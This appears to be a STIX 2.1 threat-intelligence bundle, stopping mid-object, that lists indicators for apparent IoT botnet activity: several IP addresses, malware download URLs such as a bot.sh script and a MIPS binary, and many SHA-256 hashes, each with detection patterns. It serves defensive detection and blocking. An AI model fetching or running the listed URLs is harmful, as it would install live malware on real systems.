{ "type": "bundle", "id": "bundle--8e74020f-8d1a-44c9-abcc-9072e64d24d4", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.876701Z", "modified": "2026-06-16T16:01:05.876701Z", "name": "The Hunters Ledger", "identity_class": "organization" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--63b868ea-bd7e-5ee1-ae42-c5a1a37365d9", "value": "87.106.143.220" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--32bf839a-9a7a-5a3f-816e-5d26483fa081", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.877171Z", "modified": "2026-06-16T16:01:05.877171Z", "name": "ipv4: 87.106.143.220", "indicator_types": [ "malicious-activity" ], "pattern": "[ipv4-addr:value = '87.106.143.220']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--fbd27a38-0fd5-5dc3-b15c-c1d5b869ac64", "value": "87.106.54.213" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--768f0cb9-19e4-5bda-9830-8d87db5c607d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.877825Z", "modified": "2026-06-16T16:01:05.877825Z", "name": "ipv4: 87.106.54.213", "indicator_types": [ "malicious-activity" ], "pattern": "[ipv4-addr:value = '87.106.54.213']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--2b4c9db3-4296-5b9c-9bdb-6d0a701a2e47", "value": "165.227.175.161" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--cdf8c0d6-6aa3-532e-8abf-bb23054c5f1d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.878275Z", "modified": "2026-06-16T16:01:05.878275Z", "name": "ipv4: 165.227.175.161", "indicator_types": [ "malicious-activity" ], "pattern": "[ipv4-addr:value = '165.227.175.161']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--47ce2a5d-55b8-5c44-8768-76f91fa3d98d", "value": "80.211.94.16" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b4313750-aee2-5fc7-92a7-1a89e3d1dd2f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.878723Z", "modified": "2026-06-16T16:01:05.878723Z", "name": "ipv4: 80.211.94.16", "indicator_types": [ "malicious-activity" ], "pattern": "[ipv4-addr:value = '80.211.94.16']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--f4e4db95-eb2c-5575-9345-096289d08e45", "value": "80.211.111.10" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--8737e33a-5b28-547f-baaf-be90b91aa2f8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.879143Z", "modified": "2026-06-16T16:01:05.879143Z", "name": "ipv4: 80.211.111.10", "indicator_types": [ "malicious-activity" ], "pattern": "[ipv4-addr:value = '80.211.111.10']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 80, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 80 }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--318196f3-8d54-54ad-b32f-bd9e9588bc55", "value": "188.166.194.243" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5722181f-9fb4-51ae-8ba4-a415b9f0e834", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.879567Z", "modified": "2026-06-16T16:01:05.879567Z", "name": "ipv4: 188.166.194.243", "indicator_types": [ "malicious-activity" ], "pattern": "[ipv4-addr:value = '188.166.194.243']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 60, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 60 }, { "type": "url", "spec_version": "2.1", "id": "url--28537cfa-00fe-5b54-a891-ab7eefd343fb", "value": "http://87.106.143.220/bot.sh" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--ba38d13b-6806-5a58-aaaa-41d9be22ba5f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.879991Z", "modified": "2026-06-16T16:01:05.879991Z", "name": "url: http://87.106.143.220/bot.sh", "indicator_types": [ "malicious-activity" ], "pattern": "[url:value = 'http://87.106.143.220/bot.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "url", "spec_version": "2.1", "id": "url--6db1f023-0e44-50c4-801c-bd64d71b3273", "value": "http://80.211.94.16/Naku.mips" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b128780c-e2b5-5998-9956-641264f20055", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.880443Z", "modified": "2026-06-16T16:01:05.880443Z", "name": "url: http://80.211.94.16/Naku.mips", "indicator_types": [ "malicious-activity" ], "pattern": "[url:value = 'http://80.211.94.16/Naku.mips']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--98889a40-f40e-5c33-91af-d13882f6ac89", "hashes": { "SHA-256": "64afc3b3a02706ffcf4255bda4519f8c1c66daaaf937a2641fd14a551a34e383" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--45e08149-7ac9-5e5f-85aa-cd33ce4b0e0e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.880928Z", "modified": "2026-06-16T16:01:05.880928Z", "name": "sha256: 64afc3b3a02706ffcf4255bda4519f8c1c66daaaf937a2641fd14a551a34e383", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '64afc3b3a02706ffcf4255bda4519f8c1c66daaaf937a2641fd14a551a34e383']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--762a313e-a228-560c-9a62-f6597b056e5e", "hashes": { "SHA-256": "e4d3d361ba8b25f8effcf7786b32185cf7255059fcf55b2509101779703a15aa" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--8f837c37-150c-5e17-b85e-27d954ee8430", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.88158Z", "modified": "2026-06-16T16:01:05.88158Z", "name": "sha256: e4d3d361ba8b25f8effcf7786b32185cf7255059fcf55b2509101779703a15aa", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'e4d3d361ba8b25f8effcf7786b32185cf7255059fcf55b2509101779703a15aa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--132c719a-7c8e-56cc-8e8c-f5f02b17ea22", "hashes": { "SHA-256": "b7d999255a12da91f23453ec940cdc52b64e59c6e205f227ceae98a83027de20" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--ccea46d2-2993-52e4-a4b7-47fd822f3f79", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.882338Z", "modified": "2026-06-16T16:01:05.882338Z", "name": "sha256: b7d999255a12da91f23453ec940cdc52b64e59c6e205f227ceae98a83027de20", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'b7d999255a12da91f23453ec940cdc52b64e59c6e205f227ceae98a83027de20']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--0698b00c-ae59-5c97-bd0a-9040acab8bd1", "hashes": { "SHA-256": "595f4315f00c2fce839eabe9880f669990256d6638fb148996872e37ffc9b28a" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--668538c9-ab04-5b1e-a503-3e2dfd859f97", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.883083Z", "modified": "2026-06-16T16:01:05.883083Z", "name": "sha256: 595f4315f00c2fce839eabe9880f669990256d6638fb148996872e37ffc9b28a", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '595f4315f00c2fce839eabe9880f669990256d6638fb148996872e37ffc9b28a']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--a69815c0-60d9-5e4e-86a7-3d70f7145ebc", "hashes": { "SHA-256": "ee24f4f0fb9795bca8daba73f99bf1846fe5cdb400f5345ef4a4476b20ab5bc4" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--12ab0f05-aa85-5c82-9ebe-87fad88050eb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.883676Z", "modified": "2026-06-16T16:01:05.883676Z", "name": "sha256: ee24f4f0fb9795bca8daba73f99bf1846fe5cdb400f5345ef4a4476b20ab5bc4", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'ee24f4f0fb9795bca8daba73f99bf1846fe5cdb400f5345ef4a4476b20ab5bc4']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--cfbc6618-1aa4-518e-94df-4993df73d199", "hashes": { "SHA-256": "afd49e3ceb20a8e861fa4804b6ea988f8aefd6942f84973f32b8e24c7df03410" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f3018267-421c-5c53-8002-307a664afe58", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.884196Z", "modified": "2026-06-16T16:01:05.884196Z", "name": "sha256: afd49e3ceb20a8e861fa4804b6ea988f8aefd6942f84973f32b8e24c7df03410", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'afd49e3ceb20a8e861fa4804b6ea988f8aefd6942f84973f32b8e24c7df03410']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--174fb163-dc0d-5adc-b54b-d3a84ee0b282", "hashes": { "SHA-256": "ef693f29b4ae47b1aa5920237946c3b0518ce84dd37e6fd6c6ee2e3e9dd6cd44" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0c7f700f-207c-52eb-b9a4-1da7ab6c0cea", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.884723Z", "modified": "2026-06-16T16:01:05.884723Z", "name": "sha256: ef693f29b4ae47b1aa5920237946c3b0518ce84dd37e6fd6c6ee2e3e9dd6cd44", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'ef693f29b4ae47b1aa5920237946c3b0518ce84dd37e6fd6c6ee2e3e9dd6cd44']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--5c3818af-e7b7-5d3c-a09f-6a16dd39c114", "hashes": { "SHA-256": "f90658253261f8dc63446dac49a88baa0742f46a2f5448fb330acb58017980ef" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e1b7710d-03f6-5fb4-8823-60fdacc4f3a8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.88525Z", "modified": "2026-06-16T16:01:05.88525Z", "name": "sha256: f90658253261f8dc63446dac49a88baa0742f46a2f5448fb330acb58017980ef", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'f90658253261f8dc63446dac49a88baa0742f46a2f5448fb330acb58017980ef']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--704ae4bc-eec5-5e2e-83da-d8fb37c2692c", "hashes": { "SHA-256": "8aca22aa0fc77775521eaa916f490d7a433fd8f0c0f8104bb113f6127be0e530" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--52e696b3-871b-57f0-b29e-03a290c61dbb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.88576Z", "modified": "2026-06-16T16:01:05.88576Z", "name": "sha256: 8aca22aa0fc77775521eaa916f490d7a433fd8f0c0f8104bb113f6127be0e530", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '8aca22aa0fc77775521eaa916f490d7a433fd8f0c0f8104bb113f6127be0e530']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--d45efa64-d796-5cf2-a0fb-17705b41210f", "hashes": { "SHA-256": "ec948aef742c01f91b41df9b19b0ecca3bc8ecf962e2360aee181b9b89abfc78" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--efc3a16c-5802-58c5-a7c0-4b8d08357547", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.886298Z", "modified": "2026-06-16T16:01:05.886298Z", "name": "sha256: ec948aef742c01f91b41df9b19b0ecca3bc8ecf962e2360aee181b9b89abfc78", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'ec948aef742c01f91b41df9b19b0ecca3bc8ecf962e2360aee181b9b89abfc78']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--4b7deeaa-b11f-5a56-8c58-9088a1b56d86", "hashes": { "SHA-256": "0c77fee765a40486c396e9b14f6eb9a787c4c5d9261669b60ab35fed7fe1a626" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--12e844b5-16cf-584c-8e52-c26622bef2d6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.886811Z", "modified": "2026-06-16T16:01:05.886811Z", "name": "sha256: 0c77fee765a40486c396e9b14f6eb9a787c4c5d9261669b60ab35fed7fe1a626", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '0c77fee765a40486c396e9b14f6eb9a787c4c5d9261669b60ab35fed7fe1a626']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--eea3dab9-f661-5d70-bd03-db3309f3a471", "hashes": { "SHA-256": "d3fd9994b16dc9b14c29f7faf7b5f6c84f44b06fccf82f0031a0871ce5e20e17" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--752fd330-6706-51cd-9388-18f058ef0f74", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.887612Z", "modified": "2026-06-16T16:01:05.887612Z", "name": "sha256: d3fd9994b16dc9b14c29f7faf7b5f6c84f44b06fccf82f0031a0871ce5e20e17", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'd3fd9994b16dc9b14c29f7faf7b5f6c84f44b06fccf82f0031a0871ce5e20e17']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--9948ceac-2ec0-5222-808b-b66a34fd34b2", "hashes": { "SHA-256": "e9e0eafc89e4a9db796c63bb4fdc5c0fd1106f8b9c234fb57e51a7934f2b8d8e" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--ff494eb7-7965-5ae9-8ae6-7727f8d9d55a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.888363Z", "modified": "2026-06-16T16:01:05.888363Z", "name": "sha256: e9e0eafc89e4a9db796c63bb4fdc5c0fd1106f8b9c234fb57e51a7934f2b8d8e", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'e9e0eafc89e4a9db796c63bb4fdc5c0fd1106f8b9c234fb57e51a7934f2b8d8e']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--0df884dc-a3af-5e90-b79c-af41771f1b02", "hashes": { "SHA-256": "921e4c1d86813838d40010e82a8f374a70b91f06008db5182d1ec6c2da672c09" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--67d16aa4-60f8-5825-bf58-e1ec29eafb0b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.88919Z", "modified": "2026-06-16T16:01:05.88919Z", "name": "sha256: 921e4c1d86813838d40010e82a8f374a70b91f06008db5182d1ec6c2da672c09", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '921e4c1d86813838d40010e82a8f374a70b91f06008db5182d1ec6c2da672c09']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--9de686ac-2281-5070-be47-fc29d8d9beb5", "hashes": { "SHA-256": "a19b972688158e361e8646ec17556ec46bf84f0cd24fb8707e4df85cb9d9a6d2" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--251d96df-50fa-59f5-8c38-9d118063ab2b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.889795Z", "modified": "2026-06-16T16:01:05.889795Z", "name": "sha256: a19b972688158e361e8646ec17556ec46bf84f0cd24fb8707e4df85cb9d9a6d2", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'a19b972688158e361e8646ec17556ec46bf84f0cd24fb8707e4df85cb9d9a6d2']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--e3414d7f-542e-53c4-8ca1-feb5acba727f", "hashes": { "SHA-256": "9e70449b2aafc71c7ff16ece42053fb41b92394cdb88ce799f60d50b4fbefa9e" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f0e65d04-21b2-5c35-b6bd-03929fa608ca", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.890341Z", "modified": "2026-06-16T16:01:05.890341Z", "name": "sha256: 9e70449b2aafc71c7ff16ece42053fb41b92394cdb88ce799f60d50b4fbefa9e", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '9e70449b2aafc71c7ff16ece42053fb41b92394cdb88ce799f60d50b4fbefa9e']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--9b893307-2ba6-5ccd-bbeb-bbd103a6fc82", "hashes": { "SHA-256": "d1086ab3c06764ffd81492b4c723bda83bac19dc101c8542bc566e5888c92da3" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--cf770c04-8077-5831-8a34-3856e3734c20", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.890885Z", "modified": "2026-06-16T16:01:05.890885Z", "name": "sha256: d1086ab3c06764ffd81492b4c723bda83bac19dc101c8542bc566e5888c92da3", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'd1086ab3c06764ffd81492b4c723bda83bac19dc101c8542bc566e5888c92da3']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--0701207e-31fd-5783-a23a-59f7e75d8793", "hashes": { "SHA-256": "47731b72ca73003af7770a8be876e8f41ffde37a76337eb34630d114727888e9" } }, { "type": "file", "spec_version": "2.1", "id": "file--d7de020a-c1ab-5af1-9b6c-e3cfdc315bda", "hashes": { "SHA-256": "63f0da53daac05df184c96949bcfa2e5d0d5fee425900a75ae58662479c14099" } }, { "type": "file", "spec_version": "2.1", "id": "file--86028aae-0767-5379-b0b4-a9148ad4a999", "hashes": { "SHA-256": "65eb951a0b4a0fd1e524137bbd3052255497cccac380beb11661beb45ac9b489" } }, { "type": "file", "spec_version": "2.1", "id": "file--691f35b6-e71a-5b39-8fd9-882d06e0136e", "hashes": { "SHA-256": "435da9f5fcecdbad48b6d1e572f70c122a80be7c0586492ce65d46cfb928cbee" } }, { "type": "file", "spec_version": "2.1", "id": "file--5fc4378e-5351-505d-8233-aec781882322", "hashes": { "SHA-256": "f63bb6b25c8db035173eb257a3e5d459352aff31734991637c66ea4167bf55fc" } }, { "type": "file", "spec_version": "2.1", "id": "file--259b6ec4-131a-5ee3-8688-71817d9692be", "hashes": { "SHA-256": "4a02f11edda477fc6c629a3bc857b05948fff70912f73f264779c3b36ff60fa9" } }, { "type": "file", "spec_version": "2.1", "id": "file--5e3ca335-fe0a-5d53-87da-4a5e62ac878e", "hashes": { "SHA-256": "c899c7435335dd37bfd45eefe5cd353802649c627dd26ea3e5dd26119fe4d6d3" } }, { "type": "file", "spec_version": "2.1", "id": "file--52774875-bcd6-58c8-82e9-a92083e0304a", "hashes": { "SHA-256": "33c50d71a1d9e6aa2598942893809dbfa617a2a0e86044b36b83802b382d7652" } }, { "type": "file", "spec_version": "2.1", "id": "file--c79dc0b0-d501-58c4-8fc4-bb0636c34ca0", "hashes": { "SHA-256": "4809a7ee9f5dbcbe86cfbd77a45e2a268a37bcc947e8e1621164df653597948b" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--bb4bd80d-2ce8-5d20-91ed-d048c70ce2f4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.892256Z", "modified": "2026-06-16T16:01:05.892256Z", "name": "sha256: 4809a7ee9f5dbcbe86cfbd77a45e2a268a37bcc947e8e1621164df653597948b", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '4809a7ee9f5dbcbe86cfbd77a45e2a268a37bcc947e8e1621164df653597948b']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--51e64544-133c-51fc-8d7a-6c8136537ce1", "hashes": { "SHA-256": "9d4d5ea53045d98d288b54e2208f562642a913126c16b9d8eedafab450dbb9b7" } }, { "type": "file", "spec_version": "2.1", "id": "file--c48831a8-cb7b-5527-817b-c611b6d02bba", "hashes": { "SHA-256": "64ca12cae6f5e520abb4158da3bbc14e909c2128748ae0c5806fa4206cc14260" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--8d7a6416-59fa-54ff-b023-7be84e2fa3fb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.892917Z", "modified": "2026-06-16T16:01:05.892917Z", "name": "sha256: 64ca12cae6f5e520abb4158da3bbc14e909c2128748ae0c5806fa4206cc14260", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '64ca12cae6f5e520abb4158da3bbc14e909c2128748ae0c5806fa4206cc14260']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--a20170d6-e10b-543e-a0f3-26b0e0cd7363", "hashes": { "SHA-256": "fba4072941038d27a28a1089ab24d9c3e22f0db19994f3c12c688085903a6ded" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7f1f011b-a5e3-5390-9197-47506c84c148", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.893464Z", "modified": "2026-06-16T16:01:05.893464Z", "name": "sha256: fba4072941038d27a28a1089ab24d9c3e22f0db19994f3c12c688085903a6ded", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'fba4072941038d27a28a1089ab24d9c3e22f0db19994f3c12c688085903a6ded']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--03b968a6-e8ad-547f-9757-3c400db43acd", "hashes": { "SHA-256": "58ef3f244dab408fac7117606843a3dbcfb0754b2032a5950e977bc1811c0313" } }, { "type": "file", "spec_version": "2.1", "id": 